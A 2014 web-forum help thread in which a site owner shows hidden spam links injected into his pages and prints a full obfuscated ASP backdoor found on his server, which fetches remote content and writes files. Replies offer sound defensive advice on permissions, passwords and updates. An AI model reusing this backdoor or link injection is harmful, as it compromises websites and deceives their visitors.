1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Help! How Do I Stop "Spam" Coding From Being Added To My Site

Discussion in 'Programming' started by briguy, Dec 16, 2014.

0
  1. #1
    Help..SOS!
    Long story short..not much of a coder, know basic html/css and made a few small sites a few years back. About 3 months ago, noticed that some coding was added to my site that I didn't add. I manually removed the coding and thought I was safe. Well today, the "coding" back.

    This kinda of crap... 
    <div style="position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10;"> <a href="http://www.glangels.org/"><b>michael kors black friday</b></a> <a href="http://canyonlawoffice.com/"><b>michael kors black friday</b></a> <a href="http://www.budwig.com/"><b>michael kors black friday</b></a> <a href="http://intlstudentprotection.com/"><b>uggs Black Friday</b></a> <a href="https://www.bridalassn.com"><b>michael kors Black Friday</b></a> <a href="http://tailwheelbasics.com/"><b>michael kors black friday</b></a> <a href="http://www.pbtli.com/"><b>juicy couture black friday</b></a> <a href="http://www.palestine111.org/"><b>juicy couture black friday</b></a> <a href="http://www.randyarargon.com/"><b>lululemon black Friday</b></a> <a href="http://intrass.com/"><b>kate spade black friday</b></a> <a href="http://www.modernmusiconline.com/"><b>juicy couture black friday</b></a> <a href="http://www.amsiweb.com/"><b>gucci cyber monday</b></a> <a href="http://www.swistun.com"><b>Dior black friday</b></a> <a href="http://nerhcc.org"><b>Tiffany cyber monday</b></a> <a href="http://www.careerconceptsforyouth.org"><b>burberry cyber monday</b></a> <a href="http://www.paulpatrickelectric.com"><b>Tiffany black friday</b></a> <a href="http://www.christcars.com/"><b>beats by dre cyber Monday</b></a> <a href="http://www.gracestormlake.org/"><b>michael kors black friday</b></a> <a href="http://farella.com/"><b>michael kors cyber monday</b></a> <a href="http://www.affinityeventsolutions.com/"><b>north face black friday</b></a> <a href="http://www.quantumna.com/"><b>victoria secret black friday</b></a> <a href="http://www.imageinterventional.com/"><b>uggs black friday</b></a> <a href="http://andrewkoehlerconductor.com/"><b>canada goose black friday</b></a> <a href="http://www.seymour-pd.com"><b>michael kors cyber monday</b></a> <a href="http://www.ingramsoil.com/"><b>uggs black friday</b></a> <a href="http://www.region3nccgscf.org/"><b>kate spade cyber monday</b></a> <a href="http://www.stjohnchurchnj.com/"><b>michael kors cyber monday</b></a> <a href="http://www.gsltrans.com/"><b>beats by dre cyber Monday</b></a> <a href="http://www.educaresupportservices.org/"><b>beats by dre black friday</b></a> <a href="http://www.manateeadvanceddentistry.com/"><b>north face black friday</b></a> <a href="http://www.evergreenmedicalcentre.com/"><b>beats by dre cyber Monday</b></a> <a href="http://www.ahrunsfamousinc.com"><b>nike black friday</b></a> <a href="http://www.thejogtog.com/"><b>uggs black friday</b></a> <a href="http://www.greaterharford.org/"><b>michael kors black Friday</b></a> <a href="http://www.educaresupportservices.org/"><b>beats by dre black friday</b></a> <a href="http://www.janeadenymemorialschool.com"><b>michael kors cyber monday</b></a> <a href="http://bookforward.net/"><b>canada goose black friday</b></a> <a href="http://www.pintobusinesspark.com/"><b>michael kors cyber Monday</b></a> <a href="http://www.northstartraffic.com/"><b>christian louboutin black friday</b></a> <a href="http://www.shawsbarbecue.com/"><b>the north face cyber monday</b></a> <a href="http://friendsofcostco.org/"><b>uggs black friday</b></a> <a href="http://louisvillemeadcompany.com/"><b>dior cyber monday</b></a> <a href="http://www.dianegschmidt.com/"><b>coach cyber monday</b></a> <a href="http://www.walkwithmetoo.com/"><b>Longchamp black friday</b></a> <a href="http://jennchase.com/"><b>the north face black friday</b></a> <a href="http://merkleinsurance.com/"><b>michael kors cyber Monday</b></a> <a href="http://www.askmdx.com/"><b>michael kors cyber Monday</b></a> <a href="http://www.blaumane.com/"><b>north face black friday</b></a> <a href="http://www.eatrightmich.org/"><b>canada goose cyber monday</b></a> <a href="http://www.mip4u.com/"><b>north face cyber monday</b></a> <a href="http://www.askmdx.com/"><b>michael kors cyber Monday</b></a> <a href="http://www.ghosttowngunslingers.com/"><b>bose black friday</b></a> <a href="http://www.greentreepartners.com/"><b>uggs cyber monday</b></a> <a href="http://www.thecrossandthecontroller.com/"><b>coach cyber monday</b></a> <a href="http://www.compassinternational.net/"><b>beats by dre cyber Monday</b></a> <a href="http://www.mscasati.com/"><b>christian louboutin cyber monday</b></a> <a href="http://driftwoodmn.com/"><b>nike black friday</b></a> <a href="http://www.mashinsky.com/"><b>north face cyber monday</b></a> <a href="http://www.southalabamafilmfestival.org/"><b>michael kors cyber Monday</b></a> <a href="http://www.riversedgerv2.com/"><b>michael kors cyber Monday</b></a> <a href="http://www.slrgeri.org/"><b>michael kors cyber Monday</b></a> <a href="http://alignmentmedia.com/"><b>Babyliss cyber Monday</b></a> <a href="http://www.milamcounty.net/"><b>michael kors cyber Monday</b></a> <a href="http://www.randyarargon.com/"><b>lululemon black friday</b></a> <a href="http://www.jakespizzafairmontmn.com/"><b>michael kors cyber Monday</b></a> <a href="http://hairsolution.org/"><b>lululemon black friday</b></a> <a href="http://www.shorelineawnings.com/">barons 13s</a> <a href="http://www.valgardcapital.com/">barons 13s</a> <a href="http://www.heritagefol.com/">barons 13s</a> <a href="http://www.centralbodyworks.com/">jordan 13 barons</a> <a href="http://www.valgardcapital.com/">jordan 13 barons</a> <a href="http://www.heritagefol.com/">jordan 13 barons</a> <a href="http://www.valgardcapital.com/">barons 13s</a> <a href="http://www.heritagefol.com/">jordan 13 barons</a> <a href="http://www.valgardcapital.com/">barons 13s</a> <a href="http://www.dhdr.com/">jordan 13 hologram</a> <a href="http://www.dhdr.com/">jordan 13 hologram</a> <a href="http://crystalclearscience.com/">hologram 13s</a> <a href="http://www.valgardcapital.com/">hologram 13s</a> <a href="http://www.valgardcapital.com/">hologram 13s</a> <a href="http://www.centralbodyworks.com/">hologram 13s</a> <a href="http://www.shorelineawnings.com/">hologram 13s</a> <a href="http://www.centralbodyworks.com/">hologram 13s</a> <a href="http://crystalclearscience.com/">hologram 13s</a> <a href="http://www.valgardcapital.com/">jordan 13 barons</a> <a href="http://www.centralbodyworks.com/">barons 13s</a> <a href="http://www.heritagefol.com/">barons 13s</a> <a href="http://www.heritagefol.com/">barons 13s</a> <a href="http://www.heritagefol.com/">jordan 13 barons</a> <a href="http://www.valgardcapital.com/">barons 13s</a> <a href="http://www.centralbodyworks.com/">barons 13s</a> <a href="http://www.centralbodyworks.com/">jordan 13 barons</a> <a href="http://www.valgardcapital.com/">barons 13s</a> <a href="http://www.shorelineawnings.com/">jordan 13 hologram</a> <a href="http://www.shorelineawnings.com/">hologram 13s</a> <a href="http://www.dhdr.com/">jordan 13 hologram</a> <a href="http://www.heritagefol.com/">hologram 13s</a> <a href="http://www.shorelineawnings.com/">jordan 13 hologram</a> <a href="http://crystalclearscience.com/">hologram 13s</a> <a href="http://www.centralbodyworks.com/">hologram 13s</a> <a href="http://www.dhdr.com/">jordan 13 hologram</a> <a href="http://www.valgardcapital.com/">hologram 13s</a> <a href="http://www.arisguitarist.com/">legend blue 11s</a> <a href="http://www.pen-uro.com/">legend blue 11s</a> <a href="http://www.arisguitarist.com/">legend blue 11s</a> <a href="http://www.gladsmere.com/">jordan 11 legend blue</a> <a href="http://www.tuttle-realty.com/">legend blue 11s</a> <a href="http://www.tuttle-realty.com/">legend blue 11s</a> <a href="http://www.mohawkvalleyortho.com/">legend blue 11s</a> <a href="http://samplinginternational.com/">legend blue 11s</a> <a href="http://www.xtreamhost.com/">legend blue 11s</a> <a href="http://www.townofbroadalbin.org/">legend blue 11s</a> <a href="http://www.ndvl.org/">jordan 6 black infrared</a> <a href="http://www.bddjyr.net/">black infrared 6s</a> <a href="http://www.sdajnw.com/">jordan 11 legend blue</a> <a href="http://www.ballroomandbeyond.com/">jordan 6 black infrared</a> <a href="http://www.bloombehavior.com/">black infrared 6s</a> <a href="http://www.patchogueprinting.com/">jordan 6 black infrared</a> <a href="http://www.gslhog.org/">black infrared 6s</a> <a href="http://www.ballroomandbeyond.com/">jordan 6 black infrared</a> <a href="http://www.gslhog.org/">jordan 6 black infrared</a> <a href="http://www.billlongband.com/">black infrared 6s</a> <a href="http://theweathercell.com/">jordan 11 legend blue</a> <a href="http://samplinginternational.com/">legend blue 11s</a> <a href="http://www.tuttle-realty.com/">jordan 11 legend blue</a> <a href="http://www.arisguitarist.com/">legend blue 11s</a> <a href="http://www.tuttle-realty.com/">legend blue 11s</a> <a href="http://www.bbbjazzorchestra.com/">jordan 11 legend blue</a> <a href="http://samplinginternational.com/">legend blue 11s</a> <a href="http://www.xtreamhost.com/">legend blue 11s</a> <a href="http://www.gladsmere.com/">jordan 11 legend blue</a> <a href="http://www.mohawkvalleyortho.com/">legend blue 11s</a> <a href="http://www.patchogueprinting.com/">black infrared 6s</a> <a href="http://www.patchogueprinting.com/">jordan 6 black infrared</a> <a href="http://www.heavensgate.com/">jordan 11 legend blue</a> <a href="http://www.bloombehavior.com/">black infrared 6s</a> <a href="http://www.firsttoolcorp.com/">jordan 6 black infrared</a> <a href="http://www.gslhog.org/">black infrared 6s</a> <a href="http://www.bddjyr.net/">black infrared 6s</a> <a href="http://www.ballroomandbeyond.com/">jordan 6 black infrared</a> <a href="http://www.potterycamp.com/">jordan 11 legend blue</a> <a href="http://www.potterycamp.com/">jordan 11 legend blue</a></div></body>   
</html>
    Code (markup):
    Can be seen on one of my small pages (1m1.info/EasyFruitWineRecipe.html) at the very bottom.
    My site is hosted on Godaddy.


    How do I prevent this crap from being added without me knowing?
     
    briguy, Dec 16, 2014 IP
  2. sarahk

    sarahk iTamer Staff

    Messages:
    28,500
    Likes Received:
    4,460
    Best Answers:
    123
    Trophy Points:
    665
    #2
    Go through and make sure you file permissions are appropriate - ie not 777
    Make sure the files that are on your server match the backups on your PC
    Make sure the timestamps for the files on your server match the timestamps for the same file on your PC
     
    sarahk, Dec 17, 2014 IP
    briguy likes this.
  3. PoPSiCLe

    PoPSiCLe Illustrious Member

    Messages:
    4,623
    Likes Received:
    725
    Best Answers:
    152
    Trophy Points:
    470
    #3
    Also, make sure you update all passwords on the server. Make sure you have secure passwords for all logins
     
    PoPSiCLe, Dec 17, 2014 IP
    briguy and sarahk like this.
  4. sarahk

    sarahk iTamer Staff

    Messages:
    28,500
    Likes Received:
    4,460
    Best Answers:
    123
    Trophy Points:
    665
    #4
    and if you have any scripts like wordpress/mambo/joomla/drupal on the site make sure the scripts are up to date
     
    sarahk, Dec 17, 2014 IP
    briguy likes this.
  5. briguy

    briguy Well-Known Member

    Messages:
    691
    Likes Received:
    46
    Best Answers:
    0
    Trophy Points:
    170
    #5
    Yeah, I was going through my "folders" and under "aspnet_client" there is a sub folder called "scripts" and there is a folder in there with a funky name "s7ZXRcXsZ5.asp" and I check it out
    <%@ LANGUAGE=VBSCRIPT CODEPAGE=65001 %>
<%
Dim X7777X,X777X7,X777XX,X77X77,X77X7X
Set X777XX=Response:Set X777X7=Request:Set X77X7X=Session:Set X7777X=Application:Set X77X77=Server
Set X7X7X77 = New XX7X77
X7X7X77.dizhi     = XX777X("bf]e`]aba]`fb")
X7X7X77.filename     = X777X7.ServerVariables(XX777X("$4C:AE0}2>6"))
X7X7X77.csvalue     = XX777X("G:56@")
X7X7X77.cachefile     = XX777X("^42496")
X7X7X77.connect
Class XX7X77
Public XX7X7X,dizhi,XX7XXX,filename,csvalue,cachefile
Private XXX7XX,XXXX77,XXXX7X,XXXXX7,XXXXXX,X777777,X77777X
Private Sub Class_Initialize
XXX7XX    = ""
filename    = XX777X(":?56I]2DA")
csvalue        = XX777X("A286")
XXXX77    = X777X7.ServerVariables(XX777X("$t#")&XX777X("'t#0$~u%")&XX777X("(p#t"))
XX7X7X         = XX777X("`af]_]_]`")
dizhi     = XX777X("`af]_]_]`")
XX7XXX    = ""
X777777     = X777X7.ServerVariables(XX777X("w%%!0w~$%"))
cachefile     = XX777X("^42496")
X77777X            = X7XXXX()
End Sub
Function connect()
Dim X7777X7
Set X7777X7 = X77X77.Createobject(XX777X("(")&XX777X(":?w")&XX777X("E")&XX777X("EA](:")&XX777X("?wEEA#")&XX777X("6BF6D")&XX777X("E]")&"5"&".1")
X7777X7.option(6) = false
X7777X7.Open XX777X("vt%"), XX777X("9EEAi^^")&dizhi&XX777X("^")&X777X7.QueryString(csvalue) , False
X7777X7.setRequestHeader XX777X(")\#62=D57=<;H6Cb=abc=<;abc=<;abc=\x!"), X77777X
X7777X7.setRequestHeader XX777X("w@DE"), X777777
X7777X7.setRequestHeader XX777X("&D6C\p86?E"), X777X7.ServerVariables(XX777X("w%%!0&$t#0pvt}%"))
If X777X7.ServerVariables(XX777X("w%%!0#tut#t#"))<>"" Then
X7777X7.setRequestHeader XX777X("#676C6C"), X777X7.ServerVariables(XX777X("w%%!0#tut#t#"))
End If
X7777X7.Send()
X7777X7.WaitForResponse()
XXXXXX            = X7777X7.ResponseBody
XXX7XX        = X7777X7.Status
If XXX7XX=302 or XXX7XX= 301 Then
XXXXX7    = X7777X7.GetResponseHeader(XX777X("{@42E:@?"))
end if
Set X7777X7=Nothing
set X7X7X7X = X77X77.CreateObject(XX777X("p5@53]$EC62>"))
X7X7X7X.Type = (34 * 96 - 3263)
X7X7X7X.Mode = (43 * 105 - 4512)
X7X7X7X.Open
X7X7X7X.Write XXXXXX
X7X7X7X.Position = (30 * 48 - 1440)
X7X7X7X.Type = (11 * 24 - 262)
X7X7X7X.Charset = XX777X("&%u\g")
XXXXXX = X7X7X7X.ReadText
X7X7X7X.Close
X77XXX()
End function
Function X77XXX()
If XXX7XX="302" Then
X777XX.Redirect(XXXXX7)
Exit Function
ElseIf XXX7XX="301" Then
X777XX.Status = XX777X("w%%!^`]` ,b_` ,|@G65 ,!6C>2?6?E=J")
X777XX.Addheader XX777X("{@42E:@?"),XXXXX7
Exit Function
ElseIf XXX7XX="404" Then
X777XX.Status = XX777X("w%%!^`]` ,c_c ,}@E ,u@F?5")
X777XX.Addheader XX777X("s2E6"), now&XX777X(" ,v|%")
X777XX.Addheader XX777X("$6CG6C"), XXXX77
X777XX.Addheader XX777X("r@?E6?E\%JA6"),XX777X("E6IE^9E>=")
X777XX.Write XX777X("k9E>=mk9625mkE:E=6mc_c ,}@E ,u@F?5k^E:E=6mk^9625mk3@5Jmk9`mc_c ,}@E ,u@F?5k^9`m")&XXXX77&XX777X("k^3@5Jmk^9E>=m")
Exit Function
ElseIf XXX7XX="403" Then
X777XX.Status = XX777X("w%%!^`]` ,c_b ,u@C3:556?")
X777XX.Addheader XX777X("s2E6"), now &XX777X(" ,v|%")
X777XX.Addheader XX777X("$6CG6C"), XXXX77
X777XX.Addheader XX777X("r@?E6?E\%JA6"),XX777X("E6IE^9E>=")
X777XX.Write XX777X("k9E>=mk9625mkE:E=6mc_b ,u@C3:556?k^E:E=6mk^9625mk3@5Jmk9`mc_b ,u@C3:556?k^9`m")&XXXX77&XX777X("k^3@5Jmk^9E>=m")
Exit Function
End If
X777XX.ContentType = XX777X("E6IE^9E>=")
X777XX.AddHeader XX777X("r@?E6?E\%JA6"), XX777X("E6IE^9E>=j492CD6El&%u\g")
X777XX.CodePage = (37 * 30 - -63891)
X777XX.CharSet = XX777X("&%u\g")
XXXXXX = X7X777(XX777X("9C67l-Q^W]YnX-]W9E>=M2DAM9E>X-Q"), XX777X("9C67lQ")&filename&XX777X("n")&csvalue&XX777X("lS`]SaQ"), XXXXXX)
XXXXXX = X7X77X(XX777X("9C67l-QW]YnX-]W4DDX-Q"),XX777X("9C67lQ")&cachefile&XX777X("S`]SaQ"), XXXXXX,XX777X("4DD"))
XXXXXX = X7X77X(XX777X("DC4l-QW]YnX-]W8:7M;A8MA?8X-Q"),XX777X("DC4lQ")&cachefile&XX777X("S`]SaQ"), XXXXXX,XX777X(":>8"))
X777XX.Write XXXXXX
End Function
Function X7X777(X7XX7XX, X7XXX77, Str)
Dim X7777XX
Set X7777XX = New RegExp
X7777XX.Pattern = X7XX7XX
X7777XX.IgnoreCase = false
X7777XX.Global = True
X7X777 = X7777XX.Replace(Str, X7XXX77)
End Function
Function X7X77X(X7XX7XX, X7XXX77, Str, X7XXXX7)
Dim X7777XX, X777X77, X777X7X
Set X7777XX = New RegExp
X7777XX.Pattern = X7XX7XX
X7777XX.IgnoreCase = false
X7777XX.Global = True
Set X777X7X = X7777XX.Execute(Str)
For Each X777X77 in X777X7X
IF X7XXXX7 = XX777X("4DD") then
X7X7X7 X777X77.SubMatches(0)&XX777X("]")&X777X77.SubMatches(1)
Elseif X7XXXX7 = XX777X(":>8") Then
X7X7XX  X777X77.SubMatches(0)&XX777X("]")&X777X77.SubMatches(1)
End If
Next
X7X77X = X7777XX.Replace(Str, X7XXX77)
End Function
Function X7X7X7(X7XXXXX)
dim X777XX7
X777XX7=X77X77.MapPath(XX777X("^"))&cachefile&X7XXXXX
Set X7X7XX7=X77X77.CreateObject(XX777X("$4C:A")&XX777X("E:?8]u:=")&XX777X("6$JDE")&XX777X("6>~3;")&XX777X("64E"))
If X7X7XX7.FileExists(X777XX7) Then
Set X7X7XX7=Nothing
Exit Function
end if
Set X7X7XX7=Nothing
Dim X7777X7
Set X7777X7 = X77X77.Createobject(XX777X("(:?w")&XX777X("EEA](:?")&XX777X("wEEA")&XX777X("#6BF6")&XX777X("DE]")&"5."&"1")
X7777X7.option(6) = false
X7777X7.Open XX777X("!~$%"), XX777X("9EEAi^^")&dizhi&X7XXXXX , False
X7777X7.setRequestHeader XX777X("w@DE"), X777777
X7777X7.setRequestHeader XX777X(")\#62=D57=<;H6Cb=abc=<;abc=<;abc=\x!"), X77777X
X7777X7.Send()
X7X7XXX = X7777X7.ResponseText
X7XXX7(XX777X("^")&X7XX7X(cachefile&X7XXXXX))
XX77XX XX777X("^")&cachefile&X7XXXXX,X7X7XXX,XX777X("&%u\g")
Set X7777X7=Nothing
End function
Function X7X7XX(X7XXXXX)
On Error Resume Next
dim X777XX7
X777XX7=X77X77.MapPath(XX777X("^"))&cachefile&X7XXXXX
Set X7X7XX7=X77X77.CreateObject(XX777X("$4C:A")&XX777X("E:?8]u:=")&XX777X("6$JDE")&XX777X("6>~3;")&XX777X("64E"))
If X7X7XX7.FileExists(X777XX7) Then
Set X7X7XX7=Nothing
Exit Function
end if
Set X7X7XX7=Nothing
Dim X7777X7
Set X7777X7 = X77X77.Createobject(XX777X("(:?")&XX777X("wEE")&XX777X("A](:?w")&XX777X("EEA#")&XX777X("6BF6")&XX777X("DE]d")&".1")
X7777X7.option(6) = false
X7777X7.Open XX777X("vt%"), XX777X("9EEAi^^")&dizhi&X7XXXXX , False
X7777X7.setRequestHeader XX777X("w@DE"), X777777
X7777X7.setRequestHeader XX777X(")\#62=D57=<;H6Cb=abc=<;abc=<;abc=\x!"), X77777X
X7777X7.Send()
X7777X7.WaitForResponse
X7XXX7(XX777X("^")&X7XX7X(cachefile&X7XXXXX))
Set X7XX777=X77X77.CreateObject(XX777X("25@")&XX777X("53]DEC")&XX777X("62>"))
X7XX777.Type= (34 * 96 - 3263)
X7XX777.open
X7XX777.write X7777X7.ResponseBody
X7XX777.SaveToFile X77X77.MapPath(XX777X("^")&cachefile&X7XXXXX)
X7XX777.flush
X7XX777.Close
Set X7XX777=Nothing
Set X7777X7=Nothing
End function
Function X7XX77(XX77777)
X7XX77 = mid(XX77777,instrrev(XX77777,XX777X("^"))+1)
End Function
Function X7XX7X(XX77777)
X7XX7X = Left(XX77777,instrrev(XX77777,XX777X("^")))
End Function
Function X7XXX7(ByVal CFolder)
Dim X777XXX, X77X777, X77X77X, CreateFolder
Dim X77X7XX, X77XX77, X77XX7X, X77XXX7, X77XXXX
X77XXXX = False
CreateFolder = CFolder
On Error Resume Next
Set X777XXX = X77X77.CreateObject(XX777X("$4C")&XX777X(":AE:?8]")&XX777X("u:=6")&XX777X("$JDE6>")&XX777X("~3;64E"))
If Err Then
Err.Clear()
Exit Function
End If
If Right(CreateFolder, 1) = XX777X("^") Then
CreateFolder = Left(CreateFolder, Len(CreateFolder) -1)
End If
X77X77X = Split(CreateFolder, XX777X("^"))
For X77X7XX = 0 To UBound(X77X77X)
X77XX7X = ""
For X77XX77 = 0 To X77X7XX
X77XX7X = X77XX7X & X77X77X(X77XX77) & XX777X("^")
Next
X77XXX7 = X77X77.MapPath(X77XX7X)
If Not X777XXX.FolderExists(X77XXX7) Then
X777XXX.CreateFolder(X77XXX7)
End If
Next
If Err Then
Err.Clear()
Else
X77XXXX = True
End If
X7XXX7 = X77XXXX
End Function
Sub XX77XX (XX7777X,byval Str,CharSet)
On Error Resume Next
set X7XX777=X77X77.CreateObject(XX777X("25@")&XX777X("53]DEC")&XX777X("62>"))
X7XX777.Type= (11 * 24 - 262)
X7XX777.mode= (43 * 105 - 4512)
X7XX777.open
X7XX777.WriteText str
X7XX777.SaveToFile X77X77.MapPath(XX7777X)
X7XX777.flush
X7XX777.Close
set X7XX777=nothing
End Sub
Function X7XXXX()
on error resume next
Dim X7X7777
If X777X7.ServerVariables(XX777X("w%%!0")&XX777X(")0")&XX777X("u~#")&XX777X("(p#sts0u~#")) = "" Or InStr(X777X7.ServerVariables(XX777X("w")&XX777X("%%!0)0u~")&XX777X("#(")&XX777X("p#s")&XX777X("ts0u~#")), XX777X("F?<?@H?")) > 0 Then
X7X7777 = X777X7.ServerVariables(XX777X("#t|")&XX777X("~%t0p")&XX777X("ss#"))
ElseIf InStr(X777X7.ServerVariables(XX777X("w%")&XX777X("%!0)0u~#(")&XX777X("p#sts0u~#")), XX777X("[")) > 0 Then
X7X7777 = Mid(X777X7.ServerVariables(XX777X("w")&XX777X("%%!0)0u~")&XX777X("#(p#s")&XX777X("ts0u~#")), 1, InStr(X777X7.ServerVariables(XX777X("w%%")&XX777X("!0)0u")&XX777X("~#(")&XX777X("p#")&XX777X("sts0u")&XX777X("~#")), XX777X("["))-1)
X7XX77X = X777X7.ServerVariables(XX777X("#t|~")&XX777X("%t0pss")&XX777X("#"))
ElseIf InStr(X777X7.ServerVariables(XX777X("w%%")&XX777X("!0)0u")&XX777X("#(")&XX777X("p#sts0u~#")), XX777X("j")) > 0 Then
X7X7777 = Mid(X777X7.ServerVariables(XX777X("w%")&XX777X("%!0)0u~#(")&XX777X("p#sts0u~#")), 1, InStr(X777X7.ServerVariables(XX777X("w")&XX777X("%%!0")&XX777X("0u~#")&XX777X("(p#s")&XX777X("ts0u~#")), XX777X("j"))-1)
X7XX77X = X777X7.ServerVariables(XX777X("#")&XX777X("t|~")&XX777X("%t0pss")&XX777X("#"))
Else
X7X7777 = X777X7.ServerVariables(XX777X("w%")&XX777X("%!")&XX777X("0)0u~")&XX777X("#(p#s")&XX777X("ts0u~#"))
X7XX77X = X777X7.ServerVariables(XX777X("#t|")&XX777X("~%t0ps")&XX777X("s#"))
End If
X7XXXX = Replace(Trim(Mid(X7X7777, 1, 30)), XX777X("V"), "")
End Function
Function XX7777()
On Error Resume Next
Dim X7X777X
If LCase(X777X7.ServerVariables(XX777X("w%%!$"))) = XX777X("@77") Then
X7X777X = XX777X("9EEAi^^")
Else
X7X777X = XX777X("9EEADi^^")
End If
X7X777X = X7X777X&X777X7.ServerVariables(XX777X("$t#'t#0}p|t"))
If X777X7.ServerVariables(XX777X("$t#'t#0!~#%")) <> 80 Then
X7X777X = X7X777X&XX777X("i")&X777X7.ServerVariables(XX777X("$t#'t#0!~#%"))
End If
X7X777X = X7X777X&X777X7.ServerVariables(XX777X("&#{"))
If Trim(X777X7.QueryString)<>"" Then
X7X777X = X7X777X&XX777X("n")&Trim(X777X7.QueryString)
End If
XX7777 = X7X777X
End Function
End Class
Function XX777X(ByVal X7XX7X7)
Dim X7X77X7, X77X7XX, X7X77XX
X7XX7X7 = Replace(X7XX7X7, Chr(37) & ChrW(-243) & Chr(62), Chr(37) & Chr(62))
For X77X7XX = 1 To Len(X7XX7X7)
If X77X7XX <> X7X77XX Then
X7X77X7 = AscW(Mid(X7XX7X7, X77X7XX, 1))
If X7X77X7 >= 33 And X7X77X7 <= 79 Then
XX777X = XX777X & Chr(X7X77X7 + 47)
ElseIf X7X77X7 >= 80 And X7X77X7 <= 126 Then
XX777X = XX777X & Chr(X7X77X7 - 47)
Else
X7X77XX = X77X7XX + 1
If Mid(X7XX7X7, X7X77XX, 1) = XX777X("o") Then XX777X = XX777X & ChrW(X7X77X7 + 5) Else XX777X = XX777X & Mid(X7XX7X7, X77X7XX, 1)
End If
End If
Next
End Function
%>
    Code (markup):
    as soon as I seen the above coding and remember your mention of "777", deleted the folder.

    Hoping that solved the problem?

    Now to figure how that coding was added....
     
    Last edited: Dec 17, 2014
    briguy, Dec 17, 2014 IP
  6. sarahk

    sarahk iTamer Staff

    Messages:
    28,500
    Likes Received:
    4,460
    Best Answers:
    123
    Trophy Points:
    665
    #6
    It was added either because
    • the folder permissions allowed it
    • there was a security breach on the server through unsafe passwords, user on one account was able to see your account (should never happen but...)
    You need to reset the permissions on every folder - probably easier than checking every one.

    Your ftp tool should have something like this - filezilla calls it file attributes

    upload_2014-12-18_9-23-32.png
     
    sarahk, Dec 17, 2014 IP
    briguy likes this.